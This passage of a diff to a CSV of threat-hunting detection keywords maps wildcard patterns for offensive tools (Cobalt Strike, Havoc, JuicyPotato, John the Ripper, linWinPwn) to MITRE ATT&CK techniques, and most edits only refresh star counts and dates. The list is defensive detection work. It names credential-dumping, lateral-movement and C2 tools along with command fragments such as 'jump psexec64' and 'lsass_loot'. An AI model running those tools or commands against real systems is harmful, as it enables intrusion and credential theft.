T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*JohnTheRipper *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john_crack_asrep*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*john_crack_kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john_mpi.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*JohnTheRipper *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*joomscan -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*joomscan*","offensive_tool_keyword","joomscan","Joomla Vulnerability Scanner.","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/rezasp/joomscan","1","0","N/A","N/A","10","950","250","2022-03-19T13:40:03Z","2016-09-01T09:06:17Z" "*Jormungandr.cpp*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*Jormungandr.exe*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*Jormungandr-master*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*JPCERTCC*","offensive_tool_keyword","Github Username","github repo name containing multiple tools for log exploitation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/JPCERTCC","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*jpillora/chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*jquery-c2.*.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*jpillora/chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*jquery-c2.*.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*js-cracker-client/cracker.js*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*JScriptStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*jtee43gt-6543-2iur-9422-83r5w27hgzaq*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*juicycreds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*juicycreds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*JuicyPotato.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*JuicyPotato.exe*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" -"*JuicyPotato.sln*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*JuicyPotato.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*juicypotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*juicypotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*JuicyPotato.sln*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*JuicyPotato.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*juicypotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*juicypotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*juicypotato_reflective.dll*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "*JuicyPotatoNG.cpp*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*JuicyPotatoNG.exe*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" @@ -12593,14 +12749,14 @@ "*jump psexec64*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump winrm *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*jump winrm*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*jump-exec psexec *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*jump-exec psexec *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*jump-exec scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"*JunctionFolder.exe*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*--just-clean*cleaning/to_clean.txt*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*JunctionFolder.exe*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*--just-clean*cleaning/to_clean.txt*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*jweny/zabbix-saml-bypass-exp*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","1","N/A","N/A","1","94","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z" -"*jwt_tool*","offensive_tool_keyword","jwt_tool","jwt_tool.py is a toolkit for validating. forging. scanning and tampering JWTs (JSON Web Tokens).","T1210.001 - T1201 - T1059 - T1222","TA0002 - TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ticarpi/jwt_tool","1","0","N/A","N/A","10","4461","600","2023-06-26T14:55:14Z","2017-01-23T21:13:50Z" +"*jwt_tool*","offensive_tool_keyword","jwt_tool","jwt_tool.py is a toolkit for validating. forging. scanning and tampering JWTs (JSON Web Tokens).","T1210.001 - T1201 - T1059 - T1222","TA0002 - TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ticarpi/jwt_tool","1","0","N/A","N/A","10","4465","600","2023-06-26T14:55:14Z","2017-01-23T21:13:50Z" "*-K lsass_loot*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*-k -no-pass -p '' --auth-method kerberos*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*-k -no-pass -p '' --auth-method 